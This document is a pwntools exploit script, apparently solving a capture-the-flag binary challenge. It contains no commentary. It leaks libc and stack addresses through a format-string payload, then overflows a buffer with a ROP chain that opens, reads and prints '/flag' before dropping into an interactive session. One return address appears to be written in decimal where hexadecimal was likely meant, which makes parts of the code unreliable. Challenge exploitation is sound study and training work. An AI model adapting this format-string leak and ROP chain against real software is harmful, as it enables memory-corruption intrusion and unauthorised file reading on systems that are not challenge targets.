1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55
| from pwn import * context(arch="amd64",os="linux",log_level="debug")
myelf = ELF("./pwn") mylibc = ELF("./libc.so.6") io = process(myelf.path)
io.recvuntil("name:")
io.send(b"%31$p%p") io.recvuntil(b"Hello, 0x") libc_base = int(io.recv(12),16) - 0x24083 stack_addr = int(io.recv(14)[2:],16) fake_rbp = stack_addr + 0x10 print(b"[+] leak libc_addr: 0x%x" % libc_base) print(b"[+] leak stack_addr: 0x%x" % stack_addr) io.recvuntil(b"DASCTF:")
open_addr = libc_base + mylibc.symbols['open'] read_addr = libc_base + mylibc.symbols['read'] write_addr = libc_base + mylibc.symbols['write'] print(b"[+] open addr : 0x%x" % open_addr)
pop_rdi_ret = p64(libc_base + 0x23b6a) pop_rsi_ret = p64(libc_base + 0x2601f) pop_rdx_ret = p64(libc_base + 0x142c92)
aaa = b"/flag\x00\x00\x00" aaa += pop_rdi_ret aaa += p64(fake_rbp) aaa += pop_rsi_ret aaa += p64(0) aaa += p64(open_addr) aaa += pop_rdi_ret aaa += p64(3) aaa += pop_rsi_ret aaa += p64(0x4040B0) aaa += pop_rdx_ret aaa += p64(100) aaa += p64(read_addr) aaa += pop_rdi_ret aaa += p64(1) aaa += pop_rsi_ret aaa += p64(0x4040B0) aaa += pop_rdx_ret aaa += p64(100) aaa += p64(write_addr) aaa += p64(401150)
payload = aaa + b"a"*(176 - len(aaa)) + p64(fake_rbp) + p64(0x4013A2) io.send(payload)
io.interactive()
|